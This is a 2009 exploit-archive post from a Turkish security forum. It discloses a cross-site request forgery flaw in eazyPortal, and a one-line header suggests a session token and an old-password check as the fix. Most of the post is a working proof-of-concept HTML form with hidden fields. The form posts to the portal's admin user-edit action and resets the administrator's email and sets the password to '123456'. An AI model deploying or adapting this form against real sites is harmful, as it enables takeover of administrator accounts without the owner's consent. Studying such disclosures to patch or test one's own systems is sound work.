eazyPortal ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > eazyPortal ~ XSRF Vuln.

Madde
	Author : Bug Researchers/_iLLeqaL_
	Date : 13.09.2009 21:13:50
	# eazyPortal ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : eazyPortal # vulnerable Type : XSRF # Infection : Admin sifresi degistirilebilir .. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli , eski sifre sorulmalidir .. # author : _iLLeqaL_ ~ Bug Researchers ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form action=http://[site].com/[yol]/ method=post> <input name=p type=hidden value=users /> <input name=a type=hidden value=administrator /> <input name=uedit type=hidden value=1 /> <input name=uname type=hidden value=admin /> <input name=uemail type=hidden value=mail@mail.com class=inputtext0 maxlength=50 /> <input name=upwd type=hidden value=123456 class=inputtext0 /> <input name=ucpwd type=hidden value=123456 class=inputtext0 /> <input src= http://site.com/yol/tpl/DefaultGreen/img/button_submit.gif></form> < -- bug code end of -- >